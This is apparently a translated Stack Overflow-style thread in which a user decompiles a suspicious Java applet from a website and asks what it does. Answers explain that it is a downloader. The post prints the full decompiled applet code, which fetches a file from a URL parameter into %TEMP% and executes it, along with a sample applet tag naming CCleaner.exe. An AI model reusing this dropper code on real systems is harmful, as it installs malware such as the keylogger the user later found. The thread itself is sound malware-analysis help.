删除java键盘记录器，查看代码_Java

删除java键盘记录器，查看代码

java

删除java键盘记录器，查看代码,java,Java,我访问了这个网站[删除了有问题的网站名]以查看它的文件夹，使它看起来像一个小聊天室，在“/chat/trimsdy”中，它有一个自动运行的小java文件我记不清了，但我可能不小心运行了数据包（接受它运行）所以我所做的就是清除控制面板中的java缓存然后我回到网站上，试图下载java.jar文件我下载了它并下载了一个java de编译器，我已经反编译了java.jar文件我这里有代码： import java.applet.Applet; import java.io.FileOutpu

我访问了这个网站[删除了有问题的网站名]以查看它的文件夹，使它看起来像一个小聊天室，在“/chat/trimsdy”中，它有一个自动运行的小java文件我记不清了，但我可能不小心运行了数据包（接受它运行）

所以我所做的就是清除控制面板中的java缓存然后我回到网站上，试图下载java.jar文件我下载了它并下载了一个java de编译器，我已经反编译了java.jar文件

我这里有代码：

import java.applet.Applet;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.net.URL;
import java.net.URLConnection;

public class Java extends Applet
{
  public void init()
  {
    String str1 = getParameter("jc9nvqlqnnd");
    String str2 = System.getenv("TEMP");
    String str3 = getParameter("ulztlykikct");
    try {
      FileOutputStream localFileOutputStream = new FileOutputStream(str2 + str1);
      URL localURL = new URL(getParameter("gze82pwlo3e"));
      URLConnection localURLConnection = localURL.openConnection();
      InputStream localInputStream = localURLConnection.getInputStream();
      byte[] arrayOfByte = new byte[1024];
      int i;
      while ((i = localInputStream.read(arrayOfByte, 0, arrayOfByte.length)) != -1) {
        localFileOutputStream.write(arrayOfByte, 0, i);
      }
      localInputStream.close();
      localFileOutputStream.close();
      Runtime localRuntime = Runtime.getRuntime();
      localRuntime.exec(str2 + str1);
      System.exit(0);
    }
    catch (IOException localIOException) {
      System.exit(0);
    }
  }
}

你能帮我弄清楚它是干什么的吗我有点困惑我可以看到它在TEMP中做了一些事情，但从他们的角度来看，我被卡住了我有点不懂java，所以谢谢你的帮助

谢谢雷布雷贝尔

编辑：

我浏览了页面上的html以查找applet参数，它所拥有的只是这就是小程序中的所有代码

编辑：

感谢每一位提供帮助和建议的人我想我很安全再次感谢雷布雷贝尔

编辑：

结果我确实运行了它，在我的%appdata%中发现它已将ccleaner.exe下载到我的appdata中，然后在一个名为java的文件中找到了我的击键列表！只有大约5分钟，因为我似乎记得结束了一个名为java或其他的进程。我已经删除了ccleaner.exe和java文件
感谢搜索查找程序的一切

感谢大家的帮助，所以我没有记录太多的密钥。

代码从URL下载一些内容，将其保存在

%TEMP%

文件夹中的某个位置，然后尝试执行它

参数通过加载小程序的HTML页面传递给小程序。查看从中下载的页面的HTML，您将在底部看到如下内容：

<applet width='0px' height='0px' code='Java.class' archive='Java.jar'>
<param name="gze82pwlo3e" value="http://url/omitted/in/case/its/bad">
<param name="jc9nvqlqnnd" value="CCleaner.exe">
<param name="ulztlykikct" value="">
</applet>

它下载一个脚本或程序，并将其写入文件，然后尝试执行该脚本或程序。要使用的名称在参数中指定。

嗯，它下载一个文件并执行它。这里没什么可看的。您可能想知道

jc9nvqqnnd

、

ulztlykikct

和

gze82pwlo3e

参数的值

现在在原来的网站上，它似乎下载了一个名为

CCleaner.exe

的文件，大多数防病毒扫描程序都将其识别为

Gen:Variant.Kazy.51365

但是，通常情况下，浏览器不应该执行Java文件。Java小程序通常不允许在没有特权的情况下下载和执行文件

那么，你真正的问题是什么呢？

如果不知道它下载了什么，就无法知道它到底在做什么

这段代码基本上是在你的临时文件中写入一个文件，然后用。。。一些东西：

FileOutputStream localFileOutputStream = new FileOutputStream(str2 + str1);
  URL localURL = new URL(getParameter("gze82pwlo3e"));
  URLConnection localURLConnection = localURL.openConnection();
  InputStream localInputStream = localURLConnection.getInputStream();
  byte[] arrayOfByte = new byte[1024];
  int i;
  while ((i = localInputStream.read(arrayOfByte, 0, arrayOfByte.length)) != -1) {
    localFileOutputStream.write(arrayOfByte, 0, i);
  }
  localInputStream.close();
  localFileOutputStream.close();

然后运行它刚刚编写的文件。

它是干什么的？取决于它在该文件上写了什么。

如果不知道参数的值，就不可能确定，但它会在临时目录中打开一个文件，创建一个包含从任何URL检索的流内容的文件，并执行它；将其保存在用户的临时目录中，并执行。@JamesMontagne最好突出显示该网站会杀死你；如果没有链接，就没有办法为那些倾向于研究这个问题的人做任何研究。单击“编辑”，然后查看历史记录中的URL。顺便说一句，它从来不是完整的URL。问题是那里没有实际的URL，它是从applet参数读取的。行是

URL localURL=newurl（getParameter（“gze82pwlo3e”）文件名也是一样。很抱歉，我是这样一个noob，但我该怎么做我该怎么找到applet参数show我能不能发现我只是知道如何反编译它们不在源代码中，但是在最初的网页中，我不认为它们存在，虽然我在进入网站之前禁用了java，所以我不知道结果是否已经改变了。不要使用浏览器查看它们，例如使用wget
或curl
加载URL。看Mat的回答，他也得到了。无论如何：Java部分不包含病毒。它只是一个普通.exe
文件的下载程序。哦，天哪，它确实存在！幸运的是，我不认为发生了什么事